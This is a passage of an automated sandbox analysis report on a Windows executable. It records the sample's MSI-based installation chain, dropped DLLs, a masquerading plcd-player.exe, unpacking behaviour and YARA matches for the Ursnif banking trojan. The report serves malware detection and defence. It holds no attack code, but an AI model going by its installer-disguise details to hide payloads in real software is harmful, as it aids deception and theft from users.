Source: Delimon.Win32.IO.dll.1.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Delimon.Win32.IO.dll.3.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: o4c8AUtX1g.exe

ReversingLabs: Detection: 28%

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe

File read: C:\Users\user\Desktop\o4c8AUtX1g.exe

Jump to behavior

Source: o4c8AUtX1g.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\o4c8AUtX1g.exe 'C:\Users\user\Desktop\o4c8AUtX1g.exe'
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D90C408BAA115D1625882500CC5A128E C
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Process created: C:\Windows\SysWOW64\msiexec.exe 'C:\Windows\system32\msiexec.exe' /i 'C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\adv.msi' AI_SETUPEXEPATH=C:\Users\user\Desktop\o4c8AUtX1g.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE='/exenoupdates /forcecleanup /wintime 1635154532 ' AI_EUIMSI=''
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 97E0B76AE09D0E82CE071E7BABCE98E1
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Process created: C:\Windows\SysWOW64\msiexec.exe 'C:\Windows\system32\msiexec.exe' /i 'C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\adv.msi' AI_SETUPEXEPATH=C:\Users\user\Desktop\o4c8AUtX1g.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE='/exenoupdates /forcecleanup /wintime 1635154532 ' AI_EUIMSI=''	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D90C408BAA115D1625882500CC5A128E C	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 97E0B76AE09D0E82CE071E7BABCE98E1	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Jump to behavior

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe

File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project

Jump to behavior

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe

File created: C:\Users\user\AppData\Local\Temp\shi7515.tmp

Jump to behavior

Source: classification engine

Classification label: mal69.troj.evad.winEXE@10/55@1/0

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe

Code function: 1_2_01350E70 GetDiskFreeSpaceExW,

1_2_01350E70

Source: System.Threading.Tasks.dll.1.dr, Runtime.CompilerServices/AsyncTaskMethodBuilder<TResult>.cs	Task registration methods: 'Create'
Source: System.Threading.Tasks.dll.1.dr, Runtime.CompilerServices/AsyncMethodTaskCache<TResult>.cs	Task registration methods: 'CreateCache', 'CreateCompleted'
Source: System.Threading.Tasks.dll.1.dr, Runtime.CompilerServices/AsyncTaskMethodBuilder.cs	Task registration methods: 'Create'

Source: o4c8AUtX1g

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe

Code function: 1_2_01297B80 LoadResource,LockResource,SizeofResource,

1_2_01297B80

Source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, System.Threading.Tasks.dll.1.dr

Binary or memory string: c:\b\4741\2125\src\intermediate\System.Threading.Tasks.v2.5.csproj_75e1c727\Release\System.Threading.Tasks.pdb

Source: ICSharpCode.SharpZipLib.dll.1.dr, ICSharpCode.SharpZipLib/Zip/Compression/Streams/InflaterInputBuffer.cs	Cryptographic APIs: 'TransformBlock'
Source: ICSharpCode.SharpZipLib.dll.1.dr, ICSharpCode.SharpZipLib/Zip/Compression/Streams/InflaterInputBuffer.cs	Cryptographic APIs: 'TransformBlock'
Source: ICSharpCode.SharpZipLib.dll.1.dr, ICSharpCode.SharpZipLib/Zip/Compression/Streams/DeflaterOutputStream.cs	Cryptographic APIs: 'TransformBlock'
Source: ICSharpCode.SharpZipLib.dll.1.dr, ICSharpCode.SharpZipLib/Encryption/ZipAESTransform.cs	Cryptographic APIs: 'TransformBlock'

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: o4c8AUtX1g.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: o4c8AUtX1g.exe

Static file information: File size 7840232 > 1048576

Source: o4c8AUtX1g.exe

Static PE information: certificate valid

Source: o4c8AUtX1g.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x183c00

Source: o4c8AUtX1g.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: o4c8AUtX1g.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: o4c8AUtX1g.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: o4c8AUtX1g.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: o4c8AUtX1g.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: o4c8AUtX1g.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: o4c8AUtX1g.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: o4c8AUtX1g.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wininet.pdb source: o4c8AUtX1g.exe, 00000001.00000003.673805273.0000000003E90000.00000004.00000001.sdmp
Source:	Binary string: c:\Data\SkyDrive\Programming\Projects\Delimon\Delimon.Win32.IO 2013\Win32FileLibrary\obj\Release\Delimon.Win32.IO.pdb source: o4c8AUtX1g.exe, 00000001.00000003.706113597.0000000005A36000.00000004.00000001.sdmp, Delimon.Win32.IO.dll.3.dr
Source:	Binary string: C:\JobRelease\win\Release\stubs\x86\Decoder.pdb source: o4c8AUtX1g.exe
Source:	Binary string: C:\OpenSSL\Temp\openssl-1.0.2g-x32\out32dll\ssleay32.pdb @ source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, ssleay32.dll.3.dr
Source:	Binary string: C:\JobRelease\win\Release\stubs\x86\Decoder.pdb2 source: o4c8AUtX1g.exe
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: o4c8AUtX1g.exe, 00000001.00000003.666504324.0000000003C10000.00000004.00000001.sdmp, MSI79F9.tmp.1.dr
Source:	Binary string: E:\JenkinsWorkspaces\v3-trebuchet-release\AWSDotNetPublic\sdk\src\Services\SimpleDB\obj\net35\Release\net35\AWSSDK.SimpleDB.pdbp source: o4c8AUtX1g.exe, 00000001.00000003.706113597.0000000005A36000.00000004.00000001.sdmp, AWSSDK.SimpleDB.dll.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb] source: o4c8AUtX1g.exe, 00000001.00000003.666504324.0000000003C10000.00000004.00000001.sdmp, MSI79F9.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\stubs\x86\ExternalUi.pdbk source: o4c8AUtX1g.exe
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: o4c8AUtX1g.exe, 00000001.00000003.666504324.0000000003C10000.00000004.00000001.sdmp, 440bbd.msi.3.dr
Source:	Binary string: D:\a\1\s\artifacts\obj\Microsoft.Azure.KeyVault.Core\Release\net452\Microsoft.Azure.KeyVault.Core.pdb source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, Microsoft.Azure.KeyVault.Core.dll.1.dr
Source:	Binary string: C:\JobRelease\win\Release\stubs\x86\ExternalUi.pdb source: o4c8AUtX1g.exe
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\Prereq.pdb source: o4c8AUtX1g.exe, 00000001.00000003.666756331.0000000003D73000.00000004.00000001.sdmp, 440bbd.msi.3.dr
Source:	Binary string: C:\Users\User\AppData\Local\Temp\icu_32\lib\icuio.pdb source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, icuio58.dll.3.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\Prereq.pdbi source: o4c8AUtX1g.exe, 00000001.00000003.666756331.0000000003D73000.00000004.00000001.sdmp, 440bbd.msi.3.dr
Source:	Binary string: E:\JenkinsWorkspaces\v3-trebuchet-release\AWSDotNetPublic\sdk\src\Services\SimpleDB\obj\net35\Release\net35\AWSSDK.SimpleDB.pdb source: o4c8AUtX1g.exe, 00000001.00000003.706113597.0000000005A36000.00000004.00000001.sdmp, AWSSDK.SimpleDB.dll.1.dr
Source:	Binary string: C:\Users\User\AppData\Local\Temp\icu_32\lib\icuio.pdb"" source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, icuio58.dll.3.dr
Source:	Binary string: C:\OpenSSL\Temp\openssl-1.0.2g-x32\out32dll\libeay32.pdb0k source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp
Source:	Binary string: C:\OpenSSL\Temp\openssl-1.0.2g-x32\out32dll\ssleay32.pdb source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, ssleay32.dll.3.dr
Source:	Binary string: C:\OpenSSL\Temp\openssl-1.0.2g-x32\out32dll\libeay32.pdb source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp
Source:	Binary string: c:\b\4741\2125\src\intermediate\System.Threading.Tasks.v2.5.csproj_75e1c727\Release\System.Threading.Tasks.pdb source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, System.Threading.Tasks.dll.1.dr
Source:	Binary string: D:\a\1\s\artifacts\obj\Microsoft.Azure.KeyVault.Core\Release\net452\Microsoft.Azure.KeyVault.Core.pdbSHA256 source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, Microsoft.Azure.KeyVault.Core.dll.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbj source: o4c8AUtX1g.exe, 00000001.00000003.666504324.0000000003C10000.00000004.00000001.sdmp, 440bbd.msi.3.dr
Source:	Binary string: wininet.pdbUGP source: o4c8AUtX1g.exe, 00000001.00000003.673805273.0000000003E90000.00000004.00000001.sdmp
Source:	Binary string: d:\projects\SslCertBinding.Net\src\SslCertBinding.Net\obj\Release\SslCertBinding.Net.pdb source: o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, SslCertBinding.Net.dll.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\lzmaextractor.pdb source: o4c8AUtX1g.exe, 00000001.00000003.666504324.0000000003C10000.00000004.00000001.sdmp, 440bbd.msi.3.dr

Source: o4c8AUtX1g.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: o4c8AUtX1g.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: o4c8AUtX1g.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: o4c8AUtX1g.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: o4c8AUtX1g.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe

Unpacked PE file: 9.2.plcd-player.exe.a70000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_013BC4AC push ecx; ret	1_2_013BC4BF
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_012A3CB0 push ecx; mov dword ptr [esp], ecx	1_2_012A3CB1
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 9_2_00C55731 push ecx; ret	9_2_00C55744

Source: shi7515.tmp.1.dr	Static PE information: section name: .wpp_sf
Source: shi7515.tmp.1.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe

Code function: 1_2_01363D80 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_01363D80

Source: lcms-5.0.dll.3.dr	Static PE information: real checksum: 0x4a44af should be: 0x4c891f
Source: lcms-5.0.dll.1.dr	Static PE information: real checksum: 0x4a44af should be: 0x4c891f
Source: decoder.dll.1.dr	Static PE information: real checksum: 0x0 should be: 0x378b8

Source: shi7515.tmp.1.dr

Static PE information: 0x72F9C735 [Sun Feb 16 01:34:45 2031 UTC]

Source: initial sample	Static PE information: section name: .text entropy: 7.27378716859
Source: initial sample	Static PE information: section name: .text entropy: 7.27378716859

Persistence and Installation Behavior:

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\ml			Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\ml			Jump to dropped file

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\icuio58.dll	Jump to dropped file
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\libeay32.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI11D7.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI193F.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\AWSSDK.SimpleDB.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\Microsoft.Azure.KeyVault.Core.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1488.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\libeay32.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\AWSSDK.SimpleDB.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\ssleay32.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\icuio58.dll	Jump to dropped file
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\SslCertBinding.Net.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Jump to dropped file
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\lcms-5.0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1815.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File created: C:\Users\user\AppData\Local\Temp\shi7515.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\ssleay32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\plcd-player.exe	Jump to dropped file
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File created: C:\Users\user\AppData\Local\Temp\MSI76CC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\System.Threading.Tasks.dll	Jump to dropped file
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\decoder.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI16EB.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\SslCertBinding.Net.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI15F0.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\ICSharpCode.SharpZipLib.dll	Jump to dropped file
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\System.Threading.Tasks.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\ICSharpCode.SharpZipLib.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\Delimon.Win32.IO.dll	Jump to dropped file
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Microsoft.Azure.KeyVault.Core.dll	Jump to dropped file
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Delimon.Win32.IO.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\lcms-5.0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File created: C:\Users\user\AppData\Local\Temp\MSI79F9.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI16EB.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI11D7.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI193F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI15F0.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1488.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1815.tmp	Jump to dropped file

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\CrashRpt License.txt	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\License.txt	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\License.txt	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\CrashRpt License.txt	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000009.00000003.913796145.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913762032.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913941910.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.937726154.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913912827.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.914001553.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913978289.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913841738.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913966024.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: plcd-player.exe PID: 4744, type: MEMORYSTR
Source: Yara match	File source: 9.2.plcd-player.exe.39494a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.plcd-player.exe.39494a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.plcd-player.exe.1270000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.937676135.0000000003949000.00000004.00000040.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion:
